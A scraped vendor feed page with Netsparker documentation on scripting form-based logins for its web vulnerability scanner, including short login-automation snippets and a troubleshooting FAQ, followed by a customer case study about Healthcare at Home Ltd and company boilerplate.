The browser view on right helps you preview the login form page and generate code for elements on authentication pages. This window initially loads the login form URL when opened. You can right click elements on the page to get the context menu with code generation options. You can generate code that either works immediately or works after a delay by using “Generate element code” and “Generate element code (delay 2000ms)” menu items respectively.

When you click these menu items, a single line of code will be appended to the script editor on left. If you have generated code for an input value, a JavaScript code that sets a value will be generated. If you generate code for an element like a button or an anchor, a JavaScript code that clicks that element will be generated.

You can also customize the code that is automatically generated. For example, you can replace the variable username generated for a setValueByQuery call with a hardcoded JavaScript string like john.doe (use of dynamic variables like username and password is encouraged though, if you mean to supply credential values). There are 2 variables username and password available to your scripts as mentioned above. These variables will contain the credentials of the active persona at the time of execution and by using these variables, your script will be generic enough to support multiple persona feature.

Automatically generate code for elements on the authentication page

 

The custom script editor also has a developer tools pane right below the browser view on lower right corner of the editor. This pane has all sorts of web development helper tabs that a seasoned web professional would be familiar with. All these tabs work in the context of the current loaded page in browser view and you can:

  • Inspect the current states of the HTML elements on Elements tab,

  • Monitor the HTTP requests on Network tab,

  • See logs and execute script code on Console tab,

  • etc.

There are several toolbar buttons on this window:

Load Login Form (F4): By pressing this button, a new browser view instance will be created and the specified login form URL will be loaded into this browser view. No custom script code is executed when you press this button and any cookie value will vanish from the previous browser view.

Test Script (F5): You can start executing the custom script code you have written by pressing this button. Your login form URL will be loaded into a new browser view and the script execution will start upon login form load completion. If you have several pages of custom script written, all of them will be executed in the order they are written, you can see the status of current page and the status of script execution right next to the address bar above the browser view.

Clear: This button helps you clear all the code on current page script editor.

Templates: Some sample script templates are listed under this drop down button. Selecting one of these will load the predefined script. You can start with these sample codes and tweak this script to suit your needs.

The Generate optimized code check box below to the browser view is checked by default. When enabled the Generate element menu items will try to generate most optimized and shortest CSS query code possible. For example if you have an HTML element with an id value, since id values in a HTML document uniquely identifies an element, a very concise CSS query selector with this value will be generated. In some cases, you may have randomly generated id values for your elements and having different values each time the page is loaded, hence in these cases you may want to uncheck this option to generate an alternative CSS query that is not using the id value.

Executing scripts on multiple pages

Custom scripting supports scripting against multiple pages if your form authentication consists of multiple pages or has redirects. For most of these scenarios a single page of custom script will help you authenticate with the website. The following screen capture demonstrates a form authentication case where the username (email address in this case) needs to be entered on the first page and password needs to be entered on the next page navigated:

Writing a custom script for an authentication process which takes place over several pages

Since there is a brand new document context after each page is loaded, you are required to enter your custom script code to separate pages dedicated to that page. Netsparker will give you a chance to execute your custom script code after each page navigation during the form authentication process, therefore all you need to do is create script pages on this window and write the corresponding piece of code for that page.

Form Authentication Troubleshooting, Tips & Tricks

Q: My login form is dynamically rendered inside an inline dialog and Netsparker cannot find it, how can I fill that login form?

Write a custom script that first clicks the link or button that triggers the dialog and populate the login form after a delay:

ns.auth.clickByQuery('#header > div.row > a:nth-child(1)'); // Trigger the login dialog
ns.auth.setValueByQuery('#email', username, 2000);
ns.auth.setValueByQuery('#password', password, 2000);
ns.auth.clickByQuery('#login-button', 3000);

The code above will first trigger the login dialog (first line), fill username & password after 2 seconds and click the login button in dialog on 3rd second.

Q: My login form has some other fields along with username and password, how can I fill that login form?

A: Write custom script to fill username and password from current persona variables, hardcode the rest of the credentials to your script:

ns.auth.setValueByQuery('#Username', username);
ns.auth.setValueByQuery('#Password', password);
ns.auth.setValueByQuery('#LoginCode', '4815162342'); // Hard-coded extra credential
ns.auth.clickByQuery('#LoginButton');

Q: How can I provide custom cookies that are required during form authentication?

A: Specify the cookies in the Custom Cookies section of the General section of your current scan profile. These cookies will be issued during the form authentication requests.

Q: How can I provide custom header values or change the user agent string during form authentication?

A: You can create a scan policy with custom header values and/or modified user agent strings and select it on the current profile during form authentication.

Q: My site requires me to visit some pages before displaying the login form URL and I cannot use the login form URL directly, how should I authenticate?

A: Use the first page that is required to be visited as the Login form URL. Then, using custom scripting, write code that performs navigation for each page that needs to be visited. You can click the HTML elements via scripting or simply use code like the following to just perform the navigation:

document.location = 'https://mysite.com/login/next_page.htm';

Q: My site performs several redirects before reaching the login form, how can I write custom script code for the login form?

A: Create custom script pages for each redirect leaving the script editor empty, and write your custom script for login form on the last page. Netsparker won’t run any code for pages that perform the redirect.

Q: I need to run some script code after certain amount of time, how can I do that?

A: Use the built-in setTimeout JavaScript function:

setTimeout(function() {
   // Write your JavaScript code here to execute after 2000 milliseconds
}, 2000);

TIP: Use the functions provided by Netsparker Form Authentication API (ns.auth) to set input values or click elements. These functions do not simply set values or click elements, but also simulates any necessary JavaScript events that are triggered when a user performs these tasks. Some JavaScript frameworks require these events to be fired so simply setting input values or clicking elements may not be enough.

TIP: You do not necessarily need to click the Login button on your page. If you have a JavaScript function that performs the login, you can call that function after populating the login form:

ns.auth.setValueByQuery('#Username', username);
ns.auth.setValueByQuery('#Password', password);
MyApp.LoginController.DoLogin();

Known issues

  • Netsparker does not have scripting support for popups opened during form authentication process. Please use the URL loaded into the popup window as your Login form URL if that is possible.

  • Generate element code menu items do not generate the correct CSS query for elements that are inside frames. You need to locate the elements manually by code.

https://lh6.googleusercontent.com/pUpNZvfBziUwfl2MwMXOb_R2Fq_wjThjA14I38no_cIhaBe4ow6NQwU-fR2oMlKyrXWOgQ9xBYiBd3Kd843zBsfKFN6QbVmxSDRne357MqkX7hej-sAO3JNbWDf0TP0V935CoFo
https://lh6.googleusercontent.com/pUpNZvfBziUwfl2MwMXOb_R2Fq_wjThjA14I38no_cIhaBe4ow6NQwU-fR2oMlKyrXWOgQ9xBYiBd3Kd843zBsfKFN6QbVmxSDRne357MqkX7hej-sAO3JNbWDf0TP0V935CoFo
https://lh6.googleusercontent.com/pUpNZvfBziUwfl2MwMXOb_R2Fq_wjThjA14I38no_cIhaBe4ow6NQwU-fR2oMlKyrXWOgQ9xBYiBd3Kd843zBsfKFN6QbVmxSDRne357MqkX7hej-sAO3JNbWDf0TP0V935CoFo
document.location = 'https://mysite.com/login/next_page.htm';

Healthcare at Home Ltd Drastically Reduces Costs and Improves the Development of New Web Application Features with Netsparker

0
0

Netsparker has allowed us to proactively security test our healthcare patient centric web applications to the highest level and safeguard confidentiality along with huge cost savings and ease of use.” - Dale Langham, Senior Data Platforms Manager, Healthcare at Home Ltd.

Healthcare at Home LogoHealthcare at Home Ltd was established in 1992 and the vision was, and still remains today, to enhance the way in which care is provided for patients both in the home and in the community. The company has grown rapidly since its beginnings to become the UK’s leading provider of innovative home health care services.

Unaffordable Third Party Web Application Security Services

The Healthcare at Home Ltd technical department has to maintain more than fifty websites and user portals, all of which are used 247 by staff and remote business partners alike to access patients, nurses and medicine records. To ensure the security of all the confidential data such websites hold, and to comply with the strict regulatory compliance rules Healthcare at Home hired third party security professionals. Though as the company grew and their web applications became more complex it was obvious that fully depending on third party services was not sustainable because:

  • The process of keeping the websites and confidential data secure was becoming more complex hence the prices skyrocketed and became unaffordable.
  • The development of new features in web applications was being slowed down because third party consultants were not always available, thus negatively impacting business operations.

Adding In-House Web Application Security Tests to the Equation

To ensure the continuous development and implementation of new web application features and the security of all confidential data at an affordable price, Healthcare at Home Ltd opted to move the majority of web application security tests in-house, thus reducing the dependency and costs of third party security service. “The main reason was to be able to pen test our web applications internally within the business prior to our regulatory external company pen testing. By doing so we can keep costs at a minimum and can release new web application features without waiting for when the contractor is available,” explained Dale Langham, the Senior Data Platforms Manager for Healthcare at Home Ltd.

To start doing their own web application security testing, Healhcare at Home Ltd needed a software solution that can:

  • Automatically identify vulnerabilities and security flaws in their custom built web applications.
  • Be easy to use and reports no false positive to compensate for the shortage of manpower and internal web security expertise.
  • Be able to scan both PHP and .NET web applications running on both Apache and Microsoft IIS web servers.
  • Perform fast web application security scans to keep up with the constant changes in more than fifty web applications.
  • Backed up by professional support to iron out any possible problems the team can encounter when scanning web applications.

Saving on Costs and Boosting Both Security and Productivity with Netsparker

After evaluating several automated web application security solutions Healthcare at Home Ltd chose Netsparker Desktop on the basis that it is very easy to use and reports no false positives. “I got sold on the fact that Netsparker does not report any false positives. Considering the limited amount of time we have to release new features I cannot afford to waste time verifying the scanner’s results and can go straight to the developers to report the problems,” stated Mr Langham.

“We have been using Netsparker for over 9 months now and it helped us drastically reduce our external pen testing costs and ensures we fully test our web applications prior to and during LIVE release. We are now able to internally test our web based applications after any changes we make without having to rely on external third party assistance,” continued Mr Langham.

Identifying Critical Web Application Vulnerabilities

Healthcare at Home Ltd confirmed that Netsparker already uncovered some vulnerabilities that if exploited would have allowed an attacker to gain access to confidential data. But now they are no longer worried about it. As Dale Langham explains “Netsparker has allowed us to proactively security test our healthcare patient centric web applications to the highest level and safeguard confidentiality along with huge cost savings and ease of use.”

About Healthcare at Home Ltd

Healthcare at Home Ltd was established in 1992 by founder and former chairman Charles Walsh. The vision was, and still remains today, to enhance the way in which care is provided for patients both in the home and in the community.

The company has grown rapidly since its beginnings to become the UK’s leading provider of innovative home healthcare services. We now deliver every day of the year (aside from Christmas Day, Boxing Day and New Year’s Day) supported by a bespoke IT infrastructure.

We work with the NHS, pharmaceutical companies, private medical insurers, consultants, GPs, Patient Groups and charities. Our team of over 1,000 staff operate from locations throughout the UK to provide national services delivered from a local base.

About Netsparker Ltd

Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive web application security scanners Netsparker Desktop and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Microsoft, ING bank, Skype and Ernst & Young.

Netsparker Ltd is a young and enthusiastic UK based company focused on developing automated web security products, mainly the false positive web application security scanners Netsparker Desktop and Netsparker Cloud. Netsparker management and engineers have more than two decades of experience in the web application security industry that is reflected in their products. Founded in 2009, Netsparker’s automated web vulnerability scanners are the leading security tools and are used by world renowned companies such as Samsung, NASA, Microsoft, ING bank, Skype and Ernst & Young.
Viewing all 1027 articles
Browse latest View live




Latest Images